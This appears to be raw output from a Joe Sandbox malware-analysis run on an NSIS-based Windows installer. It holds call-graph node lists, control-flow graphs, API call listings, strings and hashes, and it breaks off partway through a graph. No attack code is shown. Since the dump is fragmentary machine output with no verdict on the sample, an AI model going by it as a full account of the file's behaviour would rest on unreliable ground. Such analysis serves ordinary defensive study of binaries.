GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                • GetClientRect.USER32(?,?), ref: 00405196
                                                • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                  • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                • ShowWindow.USER32(00000000), ref: 004052E7
                                                • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                • ShowWindow.USER32(00000008), ref: 00405333
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                • CreatePopupMenu.USER32 ref: 00405376
                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                • GetWindowRect.USER32(?,?), ref: 0040539E
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                • OpenClipboard.USER32(00000000), ref: 0040540B
                                                • EmptyClipboard.USER32 ref: 00405411
                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                • CloseClipboard.USER32 ref: 0040546E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                • String ID: @rD$New install of "%s" to "%s"${
                                                • API String ID: 2110491804-2409696222
                                                • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                APIs
                                                • #17.COMCTL32 ref: 004038A2
                                                • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                • OleInitialize.OLE32(00000000), ref: 004038B4
                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                • ExitProcess.KERNEL32 ref: 00403AF1
                                                • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2162382840.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2162359614.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162429438.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162453651.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2162638815.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                Similarity
                                                • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                • API String ID: 2435955865-239407132
                                                • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 